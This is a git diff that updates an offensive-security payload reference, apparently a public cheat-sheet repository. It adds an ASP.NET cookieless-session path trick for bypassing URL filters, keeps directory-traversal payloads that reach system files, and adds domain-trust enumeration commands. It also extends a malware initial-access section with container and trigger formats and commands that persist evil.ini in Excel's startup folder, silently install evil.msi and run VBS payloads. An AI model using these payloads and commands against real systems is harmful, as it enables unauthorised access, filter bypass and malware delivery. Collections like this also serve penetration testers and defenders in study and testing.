ASPNET Cookieless Bypass

Directory Traversal/README.md

@@ -13,6 +13,7 @@
     * [Double URL encoding](#double-url-encoding)
     * [UNC Bypass](#unc-bypass)
     * [NGINX/ALB Bypass](#nginxalb-bypass)
+    * [ASPNET Cookieless Bypass](#aspnet-cookieless-bypass)
 * [Path Traversal](#path-traversal)
     * [Interesting Linux files](#interesting-linux-files)
     * [Interesting Windows files](#interesting-windows-files)
@@ -72,6 +73,7 @@ Sometimes you encounter a WAF which remove the "../" characters from the strings
 http://domain.tld/page.jsp?include=..;/..;/sensitive.txt 
 ```
 
+
 ### Double URL encoding
 
 ```powershell
@@ -82,6 +84,7 @@ http://domain.tld/page.jsp?include=..;/..;/sensitive.txt
 
 **e.g:** Spring MVC Directory Traversal Vulnerability (CVE-2018-1271) with `http://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini`
 
+
 ### UNC Bypass
 
 An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file.
@@ -90,6 +93,7 @@ An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software
 \\localhost\c$\windows\win.ini
 ```
 
+
 ### NGINX/ALB Bypass
 
 NGINX in certain configurations and ALB can block traversal attacks in the route, For example:
@@ -99,6 +103,21 @@ To bypass this behaviour just add forward slashes in front of the url:
 ```http://nginx-server////////../../```
 
 
+### ASPNET Cookieless Bypass
+
+When cookieless session state is enabled. Instead of relying on a cookie to identify the session, ASP.NET modifies the URL by embedding the Session ID directly into it.
+
+For example, a typical URL might be transformed from: `http://example.com/page.aspx` to something like: `http://example.com/(S(lit3py55t21z5v55vlm25s55))/page.aspx`. The value within `(S(...))` is the Session ID. 
+
+We can use this behavior to bypass filtered URLs.
+
+```powershell
+/admin/(S(X))/main.aspx
+/admin/Foobar/(S(X))/../(S(X))/main.aspx
+/(S(X))/admin/(S(X))/main.aspx
+```
+
+
 ### Java Bypass
 
 Bypass Java's URL protocol
@@ -210,3 +229,4 @@ The following log files are controllable and can be included with an evil payloa
 * [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)
 * [NGINX may be protecting your applications from traversal attacks without you even knowing](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d?source=friends_link&sk=e9ddbadd61576f941be97e111e953381)
 * [Directory traversal - Portswigger](https://portswigger.net/web-security/file-path-traversal)
+* [Cookieless ASPNET - Soroush Dalili](https://twitter.com/irsdl/status/1640390106312835072)

Methodology and Resources/Active Directory Attack.md

@@ -3422,19 +3422,22 @@ $obj.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$nul
 
 ### Enumerate trusts between domains
 
-```powershell
-nltest /trusted_domains
-```
+* Native `nltest`
+  ```powershell
+  nltest /trusted_domains
+  ```
+* PowerShell `GetAllTrustRelationships`
+  ```powershell
+  ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
 
-or
-
-```powershell
-([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
-
-SourceName          TargetName                    TrustType      TrustDirection
-----------          ----------                    ---------      --------------
-domainA.local      domainB.local                  TreeRoot       Bidirectional
-```
+  SourceName          TargetName                    TrustType      TrustDirection
+  ----------          ----------                    ---------      --------------
+  domainA.local      domainB.local                  TreeRoot       Bidirectional
+  ```
+* Crackmapexec module `enum_trusts`
+  ```powershell
+  cme ldap <ip> -u <user> -p <pass> -M enum_trusts 
+  ```
 
 ### Exploit trusts between domains
 

Methodology and Resources/Initial Access.md

@@ -5,7 +5,8 @@
 ## Summary
 
 * [Complex Chains](#complex-chains)
-* [Payloads](#payloads)
+* [Container](#container)
+* [Payload](#payload)
     * [Binary Files](#binary-files)
     * [Code Execution Files](#code-execution-files)
     * [Embedded Files](#embedded-files)
@@ -29,8 +30,31 @@
 * **DECOY**: used to continue pretext narration after detonating malware
     * Typically open PDF files
 
+Examples:
+* HTML SMUGGLING(PASSWORD PROTECTED ZIP + ISO(LNK + IcedID  + PNG)) used by [TA551/Storm-0303](https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/)
 
-## Payloads
+
+## Container
+
+* **ISO/IMG** - can contain hidden files, gets **automounted** giving easy access to contained files (`powershell –c .\malware.exe`)
+* **ZIP** - can contain hidden files (locate ZIP + unpack it + change dir + run Malware)
+* **WIM** - Windows Image, builtin format used to deploy system features
+    ```ps1
+    # Mount/Unmount .WIM
+    PS> Mount-WindowsImage -ImagePath myarchive.wim -Path "C:\output\path\to\extract" -Index 1
+    PS> Dismount-WindowsImage -Path "C:\output\path\to\extract" -Discard
+    ```
+* **7-zip, RAR, GZ** - should get a native support on Windows 11
+
+
+## Trigger
+
+* **LNK**
+* **CHM**
+* **ClickOnce**
+
+
+## Payload
 
 ### Binary Files
 
@@ -106,10 +130,23 @@ These files can be executed directly on the system without any third party.
 * Word with Macro (.doc, .docm)
 * Excel library (.xll)
 * Excel macro-enabled add-in file (.xlam)
+    ```ps1
+    xcopy /Q/R/S/Y/H/G/I evil.ini %APPDATA%\Microsoft\Excel\XLSTART
+    ```
 * WSF files (.wsf)
 * MSI installers (.msi)
+    ```ps1
+    powershell Unblock-File evil.msi; msiexec /q /i .\evil.msi 
+    ```
 * MSIX/APPX app package (.msix, .appx)
-* ClickOnce (.application, .vsto)
+* ClickOnce (.application, .vsto, .appref-ms)
+* Powershell scripts (.ps1)
+* Windows Script Host scripts (.wsh, .vbs)
+    ```ps1
+    cscript.exe payload.vbs
+    wscript payload.vbs
+    wscript /e:VBScript payload.txt
+    ```
 
 
 ### Embedded Files
@@ -148,5 +185,6 @@ In 2022, LAPSUS$ claimed responsibility for a cyberattack on NVIDIA, a major gra
 
 * [Top 10 Payloads: Highlighting Notable and Trending Techniques - delivr.to](https://blog.delivr.to/delivr-tos-top-10-payloads-highlighting-notable-and-trending-techniques-fb5e9fdd9356)
 * [Executing Code as a Control Panel Item through an Exported Cplapplet Function - @spotheplanet](https://www.ired.team/offensive-security/code-execution/executing-code-in-control-panel-item-through-an-exported-cplapplet-function)
-* [02. Desperate Infection Chains - Multi-Step Initial Access Strategies by Mariusz Banach](https://youtu.be/CwNPP_Xfrts)
+* [Desperate Infection Chains - Multi-Step Initial Access Strategies by Mariusz Banach - x33fcon Youtube](https://youtu.be/CwNPP_Xfrts)
+* [Desperate Infection Chains - Multi-Step Initial Access Strategies by Mariusz Banach - x33fcon PDF](https://binary-offensive.com/files/x33fcon%20-%20Desperate%20Infection%20Chains.pdf)
 * [Red Macros Factory - https://binary-offensive.com/](https://binary-offensive.com/initial-access-framework)